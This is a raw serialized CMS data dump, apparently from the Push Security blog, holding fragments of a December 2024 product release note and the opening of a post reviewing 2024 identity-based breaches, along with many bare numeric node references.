",{"data":148797,"content":148798,"nodeType":178},{},[148799,148803,148808,148812,148816],{"data":148800,"marks":148801,"value":148802,"nodeType":173},{},[],"You can find internal apps listed in the ",{"data":148804,"marks":148805,"value":148807,"nodeType":173},{},[148806],{"type":370},"Other apps",{"data":148809,"marks":148810,"value":148811,"nodeType":173},{},[]," slideout on the ",{"data":148813,"marks":148814,"value":71552,"nodeType":173},{},[148815],{"type":370},{"data":148817,"marks":148818,"value":148819,"nodeType":173},{},[]," page in the Push admin console.",{"data":148821,"content":148822,"nodeType":178},{},[148823,148827,148832,148836,148840,148844,148849],{"data":148824,"marks":148825,"value":148826,"nodeType":173},{},[],"You can also now ",{"data":148828,"marks":148829,"value":148831,"nodeType":173},{},[148830],{"type":370},"request support for any apps",{"data":148833,"marks":148834,"value":148835,"nodeType":173},{},[]," in the ",{"data":148837,"marks":148838,"value":148807,"nodeType":173},{},[148839],{"type":370},{"data":148841,"marks":148842,"value":148843,"nodeType":173},{},[]," list that you use for work but which Push doesn’t immediately recognize as a commonly used work app. From the slideout, select ",{"data":148845,"marks":148846,"value":148848,"nodeType":173},{},[148847],{"type":370},"Request app review",{"data":148850,"marks":148851,"value":148852,"nodeType":173},{},[],". Our team will take a look and add support as soon as possible.",{"data":148854,"content":148855,"nodeType":178},{},[148856,148859,148868],{"data":148857,"marks":148858,"value":37,"nodeType":173},{},[],{"data":148860,"content":148864,"nodeType":1698},{"target":148861},{"sys":148862},{"id":148863,"type":317,"linkType":318},"WciLKam7PCkbAASOdfiEw",[148865],{"data":148866,"marks":148867,"value":18605,"nodeType":173},{},[],{"data":148869,"marks":148870,"value":37,"nodeType":173},{},[],{"data":148872,"content":148873,"nodeType":169},{},[148874],{"data":148875,"marks":148876,"value":148585,"nodeType":173},{},[],{"data":148878,"content":148879,"nodeType":178},{},[148880,148884,148889],{"data":148881,"marks":148882,"value":148883,"nodeType":173},{},[],"With the release of macOS 15, Push now supports ",{"data":148885,"marks":148886,"value":148888,"nodeType":173},{},[148887],{"type":370},"managed deployment of the Push browser extension on Safari",{"data":148890,"marks":148891,"value":1477,"nodeType":173},{},[],{"data":148893,"content":148894,"nodeType":178},{},[148895],{"data":148896,"marks":148897,"value":148898,"nodeType":173},{},[],"Using your MDM, you can now deploy and activate the Push agent seamlessly without any end-user interaction.",{"data":148900,"content":148901,"nodeType":178},{},[148902],{"data":148903,"marks":148904,"value":148905,"nodeType":173},{},[],"Push already provides managed deployment support for other major browsers, including Chrome, Edge, Firefox, Brave, and Arc. ",{"data":148907,"content":148908,"nodeType":178},{},[148909,148912,148919],{"data":148910,"marks":148911,"value":37,"nodeType":173},{},[],{"data":148913,"content":148915,"nodeType":186},{"uri":148914},"/help/audience/administrators/docs/install-the-browser-extension/managed-deployment-using-an-mdm-on-macos/#instructions-for-safari",[148916],{"data":148917,"marks":148918,"value":18605,"nodeType":173},{},[],{"data":148920,"marks":148921,"value":37,"nodeType":173},{},[],"Product release: December 2024","Here’s what’s new on the Push platform for December 2024.","2024-12-19T00:00:00.000Z","product-release-december-2024",{"items":148927},[148928],{"sys":148929,"name":18399},{"id":18398},{"items":148931},[148932],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":148933},{"url":19129},"content:blog:product-release-march-2025.json","blog/product-release-march-2025.json","blog/product-release-march-2025",{"_path":148938,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":148939,"summary":148941,"title":115401,"subtitle":148952,"metaTitle":148953,"synopsis":115402,"hashTags":118,"publishedDate":115403,"slug":115404,"ogImage":148954,"tagsCollection":148956,"relatedBlogPostsCollection":148962,"authorsCollection":151155,"content":151159,"_id":152047,"_type":5439,"_source":5440,"_file":152048,"_stem":152049,"_extension":5439},"/blog/minimum-viable-identity-security",{"id":114534,"publishedAt":148940},"2025-03-03T14:23:30.799Z",{"json":148942},{"data":148943,"content":148944,"nodeType":165},{},[148945],{"data":148946,"content":148947,"nodeType":178},{},[148948],{"data":148949,"marks":148950,"value":148951,"nodeType":173},{},[],"How app developers can go beyond the Minimum Viable Secure Product (MVSP) controls framework to implement better identity protections and prevent identity-based attacks. ","8 ways app developers can go beyond MVSP to mitigate identity-based attacks","8 ways app developers can mitigate identity-based attacks",{"url":148955},"https://images.ctfassets.net/y1cdw1ablpvd/5EErNKIkhkUn2Y9OCLlDjR/2e5c107747f8d881d87484577bfd895c/Dan_Blog_Thumbnail.jpg",{"items":148957},[148958,148960],{"sys":148959,"name":26137},{"id":26136},{"sys":148961,"name":509},{"id":508},{"items":148963},[148964,149979,150607],{"__typename":1528,"sys":148965,"content":148966,"title":126606,"synopsis":126607,"hashTags":118,"publishedDate":71823,"slug":126608,"tagsCollection":149969,"authorsCollection":149975},{"id":125444},{"json":148967},{"data":148968,"content":148969,"nodeType":165},{},[148970,148976,149023,149029,149032,149038,149044,149070,149080,149083,149089,149099,149105,149121,149126,149142,149148,149158,149175,149191,149197,149213,149218,149234,149237,149243,149250,149256,149272,149288,149294,149310,149316,149323,149344,149350,149366,149383,149388,149394,149410,149413,149419,149435,149451,149457,149505,149511,149514,149520,149527,149543,149559,149565,149572,149578,149595,149601,149607,149612,149617,149620,149626,149633,149639,149655,149664,149680,149686,149692,149701,149708,149714,149731,149736,149739,149745,149751,149757,149818,149824,149830,149836,149843,149860,149866,149871,149881,149898,149904,149911,149928,149934,149940,149945,149948,149954],{"data":148971,"content":148972,"nodeType":178},{},[148973],{"data":148974,"marks":148975,"value":125455,"nodeType":173},{},[],{"data":148977,"content":148978,"nodeType":250},{},[148979,148995,149004],{"data":148980,"content":148981,"nodeType":254},{},[148982],{"data":148983,"content":148984,"nodeType":178},{},[148985,148988,148992],{"data":148986,"marks":148987,"value":125468,"nodeType":173},{},[],{"data":148989,"marks":148990,"value":125473,"nodeType":173},{},[148991],{"type":1646},{"data":148993,"marks":148994,"value":125477,"nodeType":173},{},[],{"data":148996,"content":148997,"nodeType":254},{},[148998],{"data":148999,"content":149000,"nodeType":178},{},[149001],{"data":149002,"marks":149003,"value":125487,"nodeType":173},{},[],{"data":149005,"content":149006,"nodeType":254},{},[149007],{"data":149008,"content":149009,"nodeType":178},{},[149010,149013,149020],{"data":149011,"marks":149012,"value":125497,"nodeType":173},{},[],{"data":149014,"content":149015,"nodeType":186},{"uri":125500},[149016],{"data":149017,"marks":149018,"value":125506,"nodeType":173},{},[149019],{"type":194},{"data":149021,"marks":149022,"value":125510,"nodeType":173},{},[],{"data":149024,"content":149025,"nodeType":178},{},[149026],{"data":149027,"marks":149028,"value":125517,"nodeType":173},{},[],{"data":149030,"content":149031,"nodeType":231},{},[],{"data":149033,"content":149034,"nodeType":169},{},[149035],{"data":149036,"marks":149037,"value":125527,"nodeType":173},{},[],{"data":149039,"content":149040,"nodeType":178},{},[149041],{"data":149042,"marks":149043,"value":125534,"nodeType":173},{},[],{"data":149045,"content":149046,"nodeType":178},{},[149047,149050,149057,149060,149067],{"data":149048,"marks":149049,"value":125541,"nodeType":173},{},[],{"data":149051,"content":149052,"nodeType":186},{"uri":125544},[149053],{"data":149054,"marks":149055,"value":125550,"nodeType":173},{},[149056],{"type":194},{"data":149058,"marks":149059,"value":125554,"nodeType":173},{},[],{"data":149061,"content":149062,"nodeType":186},{"uri":125557},[149063],{"data":149064,"marks":149065,"value":125563,"nodeType":173},{},[149066],{"type":194},{"data":149068,"marks":149069,"value":125567,"nodeType":173},{},[],{"data":149071,"content":149072,"nodeType":178},{},[149073,149076],{"data":149074,"marks":149075,"value":125574,"nodeType":173},{},[],{"data":149077,"marks":149078,"value":125579,"nodeType":173},{},[149079],{"type":370},{"data":149081,"content":149082,"nodeType":231},{},[],{"data":149084,"content":149085,"nodeType":169},{},[149086],{"data":149087,"marks":149088,"value":125589,"nodeType":173},{},[],{"data":149090,"content":149091,"nodeType":235},{},[149092,149096],{"data":149093,"marks":149094,"value":77025,"nodeType":173},{},[149095],{"type":370},{"data":149097,"marks":149098,"value":3107,"nodeType":173},{},[],{"data":149100,"content":149101,"nodeType":178},{},[149102],{"data":149103,"marks":149104,"value":125606,"nodeType":173},{},[],{"data":149106,"content":149107,"nodeType":178},{},[149108,149111,149118],{"data":149109,"marks":149110,"value":125613,"nodeType":173},{},[],{"data":149112,"content":149113,"nodeType":186},{"uri":40823},[149114],{"data":149115,"marks":149116,"value":125621,"nodeType":173},{},[149117],{"type":194},{"data":149119,"marks":149120,"value":125625,"nodeType":173},{},[],{"data":149122,"content":149125,"nodeType":312},{"target":149123},{"sys":149124},{"id":125630,"type":317,"linkType":318},[],{"data":149127,"content":149128,"nodeType":178},{},[149129,149132,149139],{"data":149130,"marks":149131,"value":125638,"nodeType":173},{},[],{"data":149133,"content":149134,"nodeType":186},{"uri":111565},[149135],{"data":149136,"marks":149137,"value":125646,"nodeType":173},{},[149138],{"type":194},{"data":149140,"marks":149141,"value":125650,"nodeType":173},{},[],{"data":149143,"content":149144,"nodeType":178},{},[149145],{"data":149146,"marks":149147,"value":125657,"nodeType":173},{},[],{"data":149149,"content":149150,"nodeType":235},{},[149151,149155],{"data":149152,"marks":149153,"value":24287,"nodeType":173},{},[149154],{"type":370},{"data":149156,"marks":149157,"value":3107,"nodeType":173},{},[],{"data":149159,"content":149160,"nodeType":178},{},[149161,149164,149172],{"data":149162,"marks":149163,"value":125674,"nodeType":173},{},[],{"data":149165,"content":149166,"nodeType":186},{"uri":9099},[149167],{"data":149168,"marks":149169,"value":125683,"nodeType":173},{},[149170,149171],{"type":194},{"type":370},{"data":149173,"marks":149174,"value":125687,"nodeType":173},{},[],{"data":149176,"content":149177,"nodeType":178},{},[149178,149181,149188],{"data":149179,"marks":149180,"value":125694,"nodeType":173},{},[],{"data":149182,"content":149183,"nodeType":186},{"uri":125697},[149184],{"data":149185,"marks":149186,"value":125703,"nodeType":173},{},[149187],{"type":194},{"data":149189,"marks":149190,"value":125707,"nodeType":173},{},[],{"data":149192,"content":149193,"nodeType":178},{},[149194],{"data":149195,"marks":149196,"value":125714,"nodeType":173},{},[],{"data":149198,"content":149199,"nodeType":178},{},[149200,149203,149210],{"data":149201,"marks":149202,"value":125721,"nodeType":173},{},[],{"data":149204,"content":149205,"nodeType":186},{"uri":4492},[149206],{"data":149207,"marks":149208,"value":125729,"nodeType":173},{},[149209],{"type":194},{"data":149211,"marks":149212,"value":125733,"nodeType":173},{},[],{"data":149214,"content":149217,"nodeType":312},{"target":149215},{"sys":149216},{"id":125738,"type":317,"linkType":318},[],{"data":149219,"content":149220,"nodeType":178},{},[149221,149224,149231],{"data":149222,"marks":149223,"value":125746,"nodeType":173},{},[],{"data":149225,"content":149226,"nodeType":186},{"uri":125749},[149227],{"data":149228,"marks":149229,"value":125755,"nodeType":173},{},[149230],{"type":194},{"data":149232,"marks":149233,"value":125759,"nodeType":173},{},[],{"data":149235,"content":149236,"nodeType":231},{},[],{"data":149238,"content":149239,"nodeType":169},{},[149240],{"data":149241,"marks":149242,"value":125769,"nodeType":173},{},[],{"data":149244,"content":149245,"nodeType":235},{},[149246],{"data":149247,"marks":149248,"value":77025,"nodeType":173},{},[149249],{"type":370},{"data":149251,"content":149252,"nodeType":178},{},[149253],{"data":149254,"marks":149255,"value":125783,"nodeType":173},{},[],{"data":149257,"content":149258,"nodeType":178},{},[149259,149262,149269],{"data":149260,"marks":149261,"value":125790,"nodeType":173},{},[],{"data":149263,"content":149264,"nodeType":186},{"uri":49844},[149265],{"data":149266,"marks":149267,"value":125798,"nodeType":173},{},[149268],{"type":194},{"data":149270,"marks":149271,"value":125802,"nodeType":173},{},[],{"data":149273,"content":149274,"nodeType":178},{},[149275,149278,149285],{"data":149276,"marks":149277,"value":125809,"nodeType":173},{},[],{"data":149279,"content":149280,"nodeType":186},{"uri":125812},[149281],{"data":149282,"marks":149283,"value":1255,"nodeType":173},{},[149284],{"type":194},{"data":149286,"marks":149287,"value":53584,"nodeType":173},{},[],{"data":149289,"content":149290,"nodeType":178},{},[149291],{"data":149292,"marks":149293,"value":125827,"nodeType":173},{},[],{"data":149295,"content":149296,"nodeType":178},{},[149297,149300,149307],{"data":149298,"marks":149299,"value":125834,"nodeType":173},{},[],{"data":149301,"content":149302,"nodeType":186},{"uri":74693},[149303],{"data":149304,"marks":149305,"value":125842,"nodeType":173},{},[149306],{"type":194},{"data":149308,"marks":149309,"value":125846,"nodeType":173},{},[],{"data":149311,"content":149312,"nodeType":178},{},[149313],{"data":149314,"marks":149315,"value":125853,"nodeType":173},{},[],{"data":149317,"content":149318,"nodeType":235},{},[149319],{"data":149320,"marks":149321,"value":24287,"nodeType":173},{},[149322],{"type":370},{"data":149324,"content":149325,"nodeType":178},{},[149326,149329,149337,149341],{"data":149327,"marks":149328,"value":125867,"nodeType":173},{},[],{"data":149330,"content":149331,"nodeType":186},{"uri":75048},[149332],{"data":149333,"marks":149334,"value":125876,"nodeType":173},{},[149335,149336],{"type":194},{"type":370},{"data":149338,"marks":149339,"value":125881,"nodeType":173},{},[149340],{"type":370},{"data":149342,"marks":149343,"value":197,"nodeType":173},{},[],{"data":149345,"content":149346,"nodeType":178},{},[149347],{"data":149348,"marks":149349,"value":125891,"nodeType":173},{},[],{"data":149351,"content":149352,"nodeType":178},{},[149353,149356,149363],{"data":149354,"marks":149355,"value":125898,"nodeType":173},{},[],{"data":149357,"content":149358,"nodeType":186},{"uri":125901},[149359],{"data":149360,"marks":149361,"value":74524,"nodeType":173},{},[149362],{"type":194},{"data":149364,"marks":149365,"value":125910,"nodeType":173},{},[],{"data":149367,"content":149368,"nodeType":178},{},[149369,149372,149380],{"data":149370,"marks":149371,"value":125917,"nodeType":173},{},[],{"data":149373,"content":149374,"nodeType":186},{"uri":75027},[149375],{"data":149376,"marks":149377,"value":125926,"nodeType":173},{},[149378,149379],{"type":194},{"type":370},{"data":149381,"marks":149382,"value":125930,"nodeType":173},{},[],{"data":149384,"content":149387,"nodeType":312},{"target":149385},{"sys":149386},{"id":125935,"type":317,"linkType":318},[],{"data":149389,"content":149390,"nodeType":178},{},[149391],{"data":149392,"marks":149393,"value":125943,"nodeType":173},{},[],{"data":149395,"content":149396,"nodeType":178},{},[149397,149400,149407],{"data":149398,"marks":149399,"value":125950,"nodeType":173},{},[],{"data":149401,"content":149402,"nodeType":186},{"uri":81621},[149403],{"data":149404,"marks":149405,"value":125958,"nodeType":173},{},[149406],{"type":194},{"data":149408,"marks":149409,"value":125962,"nodeType":173},{},[],{"data":149411,"content":149412,"nodeType":231},{},[],{"data":149414,"content":149415,"nodeType":169},{},[149416],{"data":149417,"marks":149418,"value":125972,"nodeType":173},{},[],{"data":149420,"content":149421,"nodeType":178},{},[149422,149425,149432],{"data":149423,"marks":149424,"value":125979,"nodeType":173},{},[],{"data":149426,"content":149427,"nodeType":186},{"uri":125982},[149428],{"data":149429,"marks":149430,"value":1300,"nodeType":173},{},[149431],{"type":194},{"data":149433,"marks":149434,"value":1477,"nodeType":173},{},[],{"data":149436,"content":149437,"nodeType":178},{},[149438,149441,149448],{"data":149439,"marks":149440,"value":125997,"nodeType":173},{},[],{"data":149442,"content":149443,"nodeType":186},{"uri":819},[149444],{"data":149445,"marks":149446,"value":126005,"nodeType":173},{},[149447],{"type":194},{"data":149449,"marks":149450,"value":126009,"nodeType":173},{},[],{"data":149452,"content":149453,"nodeType":178},{},[149454],{"data":149455,"marks":149456,"value":126016,"nodeType":173},{},[],{"data":149458,"content":149459,"nodeType":250},{},[149460,149469,149478,149487,149496],{"data":149461,"content":149462,"nodeType":254},{},[149463],{"data":149464,"content":149465,"nodeType":178},{},[149466],{"data":149467,"marks":149468,"value":126029,"nodeType":173},{},[],{"data":149470,"content":149471,"nodeType":254},{},[149472],{"data":149473,"content":149474,"nodeType":178},{},[149475],{"data":149476,"marks":149477,"value":126039,"nodeType":173},{},[],{"data":149479,"content":149480,"nodeType":254},{},[149481],{"data":149482,"content":149483,"nodeType":178},{},[149484],{"data":149485,"marks":149486,"value":126049,"nodeType":173},{},[],{"data":149488,"content":149489,"nodeType":254},{},[149490],{"data":149491,"content":149492,"nodeType":178},{},[149493],{"data":149494,"marks":149495,"value":126059,"nodeType":173},{},[],{"data":149497,"content":149498,"nodeType":254},{},[149499],{"data":149500,"content":149501,"nodeType":178},{},[149502],{"data":149503,"marks":149504,"value":126069,"nodeType":173},{},[],{"data":149506,"content":149507,"nodeType":178},{},[149508],{"data":149509,"marks":149510,"value":126076,"nodeType":173},{},[],{"data":149512,"content":149513,"nodeType":231},{},[],{"data":149515,"content":149516,"nodeType":169},{},[149517],{"data":149518,"marks":149519,"value":126086,"nodeType":173},{},[],{"data":149521,"content":149522,"nodeType":235},{},[149523],{"data":149524,"marks":149525,"value":77025,"nodeType":173},{},[149526],{"type":370},{"data":149528,"content":149529,"nodeType":178},{},[149530,149533,149540],{"data":149531,"marks":149532,"value":37,"nodeType":173},{},[],{"data":149534,"content":149535,"nodeType":186},{"uri":126102},[149536],{"data":149537,"marks":149538,"value":126108,"nodeType":173},{},[149539],{"type":194},{"data":149541,"marks":149542,"value":126112,"nodeType":173},{},[],{"data":149544,"content":149545,"nodeType":178},{},[149546,149549,149556],{"data":149547,"marks":149548,"value":126119,"nodeType":173},{},[],{"data":149550,"content":149551,"nodeType":186},{"uri":126122},[149552],{"data":149553,"marks":149554,"value":126128,"nodeType":173},{},[149555],{"type":194},{"data":149557,"marks":149558,"value":126132,"nodeType":173},{},[],{"data":149560,"content":149561,"nodeType":178},{},[149562],{"data":149563,"marks":149564,"value":126139,"nodeType":173},{},[],{"data":149566,"content":149567,"nodeType":235},{},[149568],{"data":149569,"marks":149570,"value":24287,"nodeType":173},{},[149571],{"type":370},{"data":149573,"content":149574,"nodeType":178},{},[149575],{"data":149576,"marks":149577,"value":126153,"nodeType":173},{},[],{"data":149579,"content":149580,"nodeType":178},{},[149581,149584,149592],{"data":149582,"marks":149583,"value":4729,"nodeType":173},{},[],{"data":149585,"content":149586,"nodeType":186},{"uri":4751},[149587],{"data":149588,"marks":149589,"value":126168,"nodeType":173},{},[149590,149591],{"type":194},{"type":370},{"data":149593,"marks":149594,"value":126172,"nodeType":173},{},[],{"data":149596,"content":149597,"nodeType":178},{},[149598],{"data":149599,"marks":149600,"value":126179,"nodeType":173},{},[],{"data":149602,"content":149603,"nodeType":178},{},[149604],{"data":149605,"marks":149606,"value":126186,"nodeType":173},{},[],{"data":149608,"content":149611,"nodeType":312},{"target":149609},{"sys":149610},{"id":105035,"type":317,"linkType":318},[],{"data":149613,"content":149616,"nodeType":312},{"target":149614},{"sys":149615},{"id":126196,"type":317,"linkType":318},[],{"data":149618,"content":149619,"nodeType":231},{},[],{"data":149621,"content":149622,"nodeType":169},{},[149623],{"data":149624,"marks":149625,"value":126207,"nodeType":173},{},[],{"data":149627,"content":149628,"nodeType":235},{},[149629],{"data":149630,"marks":149631,"value":77025,"nodeType":173},{},[149632],{"type":370},{"data":149634,"content":149635,"nodeType":178},{},[149636],{"data":149637,"marks":149638,"value":126221,"nodeType":173},{},[],{"data":149640,"content":149641,"nodeType":178},{},[149642,149645,149652],{"data":149643,"marks":149644,"value":126228,"nodeType":173},{},[],{"data":149646,"content":149647,"nodeType":186},{"uri":71244},[149648],{"data":149649,"marks":149650,"value":126236,"nodeType":173},{},[149651],{"type":194},{"data":149653,"marks":149654,"value":126240,"nodeType":173},{},[],{"data":149656,"content":149657,"nodeType":3769},{},[149658],{"data":149659,"content":149660,"nodeType":178},{},[149661],{"data":149662,"marks":149663,"value":126250,"nodeType":173},{},[],{"data":149665,"content":149666,"nodeType":178},{},[149667,149670,149677],{"data":149668,"marks":149669,"value":126257,"nodeType":173},{},[],{"data":149671,"content":149672,"nodeType":186},{"uri":126102},[149673],{"data":149674,"marks":149675,"value":126265,"nodeType":173},{},[149676],{"type":194},{"data":149678,"marks":149679,"value":126269,"nodeType":173},{},[],{"data":149681,"content":149682,"nodeType":178},{},[149683],{"data":149684,"marks":149685,"value":126276,"nodeType":173},{},[],{"data":149687,"content":149688,"nodeType":178},{},[149689],{"data":149690,"marks":149691,"value":126283,"nodeType":173},{},[],{"data":149693,"content":149694,"nodeType":3769},{},[149695],{"data":149696,"content":149697,"nodeType":178},{},[149698],{"data":149699,"marks":149700,"value":126293,"nodeType":173},{},[],{"data":149702,"content":149703,"nodeType":235},{},[149704],{"data":149705,"marks":149706,"value":24287,"nodeType":173},{},[149707],{"type":370},{"data":149709,"content":149710,"nodeType":178},{},[149711],{"data":149712,"marks":149713,"value":126307,"nodeType":173},{},[],{"data":149715,"content":149716,"nodeType":178},{},[149717,149720,149728],{"data":149718,"marks":149719,"value":126314,"nodeType":173},{},[],{"data":149721,"content":149722,"nodeType":186},{"uri":62639},[149723],{"data":149724,"marks":149725,"value":126323,"nodeType":173},{},[149726,149727],{"type":194},{"type":370},{"data":149729,"marks":149730,"value":126327,"nodeType":173},{},[],{"data":149732,"content":149735,"nodeType":312},{"target":149733},{"sys":149734},{"id":126332,"type":317,"linkType":318},[],{"data":149737,"content":149738,"nodeType":231},{},[],{"data":149740,"content":149741,"nodeType":169},{},[149742],{"data":149743,"marks":149744,"value":126343,"nodeType":173},{},[],{"data":149746,"content":149747,"nodeType":178},{},[149748],{"data":149749,"marks":149750,"value":126350,"nodeType":173},{},[],{"data":149752,"content":149753,"nodeType":178},{},[149754],{"data":149755,"marks":149756,"value":126357,"nodeType":173},{},[],{"data":149758,"content":149759,"nodeType":250},{},[149760,149776,149792],{"data":149761,"content":149762,"nodeType":254},{},[149763],{"data":149764,"content":149765,"nodeType":178},{},[149766,149769,149773],{"data":149767,"marks":149768,"value":126370,"nodeType":173},{},[],{"data":149770,"marks":149771,"value":126375,"nodeType":173},{},[149772],{"type":370},{"data":149774,"marks":149775,"value":126379,"nodeType":173},{},[],{"data":149777,"content":149778,"nodeType":254},{},[149779],{"data":149780,"content":149781,"nodeType":178},{},[149782,149785,149789],{"data":149783,"marks":149784,"value":126389,"nodeType":173},{},[],{"data":149786,"marks":149787,"value":126394,"nodeType":173},{},[149788],{"type":370},{"data":149790,"marks":149791,"value":126398,"nodeType":173},{},[],{"data":149793,"content":149794,"nodeType":254},{},[149795],{"data":149796,"content":149797,"nodeType":178},{},[149798,149801,149805,149808,149815],{"data":149799,"marks":149800,"value":126408,"nodeType":173},{},[],{"data":149802,"marks":149803,"value":126413,"nodeType":173},{},[149804],{"type":370},{"data":149806,"marks":149807,"value":126417,"nodeType":173},{},[],{"data":149809,"content":149810,"nodeType":186},{"uri":4342},[149811],{"data":149812,"marks":149813,"value":835,"nodeType":173},{},[149814],{"type":194},{"data":149816,"marks":149817,"value":126428,"nodeType":173},{},[],{"data":149819,"content":149820,"nodeType":178},{},[149821],{"data":149822,"marks":149823,"value":126435,"nodeType":173},{},[],{"data":149825,"content":149826,"nodeType":178},{},[149827],{"data":149828,"marks":149829,"value":126442,"nodeType":173},{},[],{"data":149831,"content":149832,"nodeType":178},{},[149833],{"data":149834,"marks":149835,"value":126449,"nodeType":173},{},[],{"data":149837,"content":149838,"nodeType":235},{},[149839],{"data":149840,"marks":149841,"value":126457,"nodeType":173},{},[149842],{"type":370},{"data":149844,"content":149845,"nodeType":178},{},[149846,149849,149857],{"data":149847,"marks":149848,"value":126464,"nodeType":173},{},[],{"data":149850,"content":149851,"nodeType":186},{"uri":126467},[149852],{"data":149853,"marks":149854,"value":126474,"nodeType":173},{},[149855,149856],{"type":194},{"type":370},{"data":149858,"marks":149859,"value":126478,"nodeType":173},{},[],{"data":149861,"content":149862,"nodeType":178},{},[149863],{"data":149864,"marks":149865,"value":126485,"nodeType":173},{},[],{"data":149867,"content":149870,"nodeType":312},{"target":149868},{"sys":149869},{"id":126490,"type":317,"linkType":318},[],{"data":149872,"content":149873,"nodeType":235},{},[149874,149878],{"data":149875,"marks":149876,"value":126499,"nodeType":173},{},[149877],{"type":370},{"data":149879,"marks":149880,"value":3107,"nodeType":173},{},[],{"data":149882,"content":149883,"nodeType":178},{},[149884,149887,149895],{"data":149885,"marks":149886,"value":126509,"nodeType":173},{},[],{"data":149888,"content":149889,"nodeType":186},{"uri":126512},[149890],{"data":149891,"marks":149892,"value":126519,"nodeType":173},{},[149893,149894],{"type":194},{"type":370},{"data":149896,"marks":149897,"value":126523,"nodeType":173},{},[],{"data":149899,"content":149900,"nodeType":178},{},[149901],{"data":149902,"marks":149903,"value":126530,"nodeType":173},{},[],{"data":149905,"content":149906,"nodeType":235},{},[149907],{"data":149908,"marks":149909,"value":126538,"nodeType":173},{},[149910],{"type":370},{"data":149912,"content":149913,"nodeType":178},{},[149914,149917,149925],{"data":149915,"marks":149916,"value":126545,"nodeType":173},{},[],{"data":149918,"content":149919,"nodeType":186},{"uri":77513},[149920],{"data":149921,"marks":149922,"value":2570,"nodeType":173},{},[149923,149924],{"type":194},{"type":370},{"data":149926,"marks":149927,"value":126557,"nodeType":173},{},[],{"data":149929,"content":149930,"nodeType":178},{},[149931],{"data":149932,"marks":149933,"value":126564,"nodeType":173},{},[],{"data":149935,"content":149936,"nodeType":178},{},[149937],{"data":149938,"marks":149939,"value":126571,"nodeType":173},{},[],{"data":149941,"content":149944,"nodeType":312},{"target":149942},{"sys":149943},{"id":126576,"type":317,"linkType":318},[],{"data":149946,"content":149947,"nodeType":231},{},[],{"data":149949,"content":149950,"nodeType":169},{},[149951],{"data":149952,"marks":149953,"value":126587,"nodeType":173},{},[],{"data":149955,"content":149956,"nodeType":178},{},[149957,149960,149966],{"data":149958,"marks":149959,"value":126594,"nodeType":173},{},[],{"data":149961,"content":149962,"nodeType":186},{"uri":473},[149963],{"data":149964,"marks":149965,"value":126601,"nodeType":173},{},[],{"data":149967,"marks":149968,"value":126605,"nodeType":173},{},[],{"items":149970},[149971,149973],{"sys":149972,"name":509},{"id":508},{"sys":149974,"name":26137},{"id":26136},{"items":149976},[149977],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":149978},{"url":2911},{"__typename":1528,"sys":149980,"content":149981,"title":114081,"synopsis":150597,"hashTags":118,"publishedDate":150598,"slug":114082,"tagsCollection":150599,"authorsCollection":150603},{"id":113695},{"json":149982},{"nodeType":165,"data":149983,"content":149984},{},[149985,149992,149999,150006,150025,150032,150039,150042,150050,150057,150064,150071,150077,150084,150087,150095,150102,150109,150116,150123,150129,150136,150139,150147,150155,150162,150169,150176,150195,150203,150210,150217,150224,150231,150239,150246,150253,150259,150262,150270,150277,150284,150291,150298,150305,150308,150316,150323,150330,150337,150344,150351,150459,150475,150482,150488,150491,150499,150506,150573,150580],{"nodeType":178,"data":149986,"content":149987},{},[149988],{"nodeType":173,"value":149989,"marks":149990,"data":149991},"2024 was an unprecedented year in terms of the impact of identity-based attacks. Or that’s what it felt like anyway, so I decided to trawl through a year of news to see if reality stacked up. ",[],{},{"nodeType":178,"data":149993,"content":149994},{},[149995],{"nodeType":173,"value":149996,"marks":149997,"data":149998},"My main obstacles here were the ever-disappointing levels of public information disclosure for cyber breaches. Even where breaches are disclosed, it’s rare that any public information contains the nature of the initial access vector (though I can’t say I’m surprised — it’s hard to argue the ‘highly sophisticated’ nature of a breach that involved stolen credentials and no MFA). ",[],{},{"nodeType":178,"data":150000,"content":150001},{},[150002],{"nodeType":173,"value":150003,"marks":150004,"data":150005},"Publicly disclosed breaches are just the tip of the iceberg, and with the rise in data theft and extortion over more disruptive attacks (e.g. ransomware), there is often no obvious service interruption indicating that an incident has taken place. This makes it more likely that these situations can be settled quietly or smoothed over, without hitting the headlines. ",[],{},{"nodeType":178,"data":150007,"content":150008},{},[150009,150013,150022],{"nodeType":173,"value":150010,"marks":150011,"data":150012},"That said, the requirement that US companies submit a Form-8K for breaches of a material nature does appear to have increased the number of voluntary declarations (inside the US, at least) and the growing willingness of the SEC to prosecute negligent or misleading behavior is also a considerable motivator, such as ",[],{},{"nodeType":186,"data":150014,"content":150016},{"uri":150015},"https://www.bleepingcomputer.com/news/security/sec-charges-tech-companies-for-downplaying-solarwinds-breaches/",[150017],{"nodeType":173,"value":150018,"marks":150019,"data":150021},"the recent prosecution of companies for misleading investors about the impact of the 2020 SolarWinds Orion hack",[150020],{"type":194},{},{"nodeType":173,"value":1477,"marks":150023,"data":150024},[],{},{"nodeType":178,"data":150026,"content":150027},{},[150028],{"nodeType":173,"value":150029,"marks":150030,"data":150031},"Despite all this, I totalled 30 breaches that were the result of an identity-based initial access vector, such as phishing, credential stuffing, social engineering, session hijacking, etc. To make the list, it had to have appeared in the public domain, confirmed by the victim or an authoritative source, and the breach vector had to have been named. ",[],{},{"nodeType":178,"data":150033,"content":150034},{},[150035],{"nodeType":173,"value":150036,"marks":150037,"data":150038},"Public identity-related breaches in 2024 resulted in hundreds of millions of breached customer records (with the final impact of many still yet to appear in the public domain).",[],{},{"nodeType":231,"data":150040,"content":150041},{},[],{"nodeType":169,"data":150043,"content":150044},{},[150045],{"nodeType":173,"value":150046,"marks":150047,"data":150049},"What is an identity attack?",[150048],{"type":370},{},{"nodeType":178,"data":150051,"content":150052},{},[150053],{"nodeType":173,"value":150054,"marks":150055,"data":150056},"First, what do we mean by identity attack? ",[],{},{"nodeType":178,"data":150058,"content":150059},{},[150060],{"nodeType":173,"value":150061,"marks":150062,"data":150063},"An identity attack is any attack (regardless of the steps that follow) involving identity-based techniques, such as phishing, credential stuffing, and session hijacking, to log into an account/service. Basically, where identity is the initial breach vector.",[],{},{"nodeType":178,"data":150065,"content":150066},{},[150067],{"nodeType":173,"value":150068,"marks":150069,"data":150070},"The length and complexity of the overall attack chain will vary. For example, a SaaS-based account takeover where the attacker logs in and dumps the data from the app is naturally going to be more direct than a scenario in which an identity-based compromise leads to the takeover of an endpoint or device in a traditional networking environment. 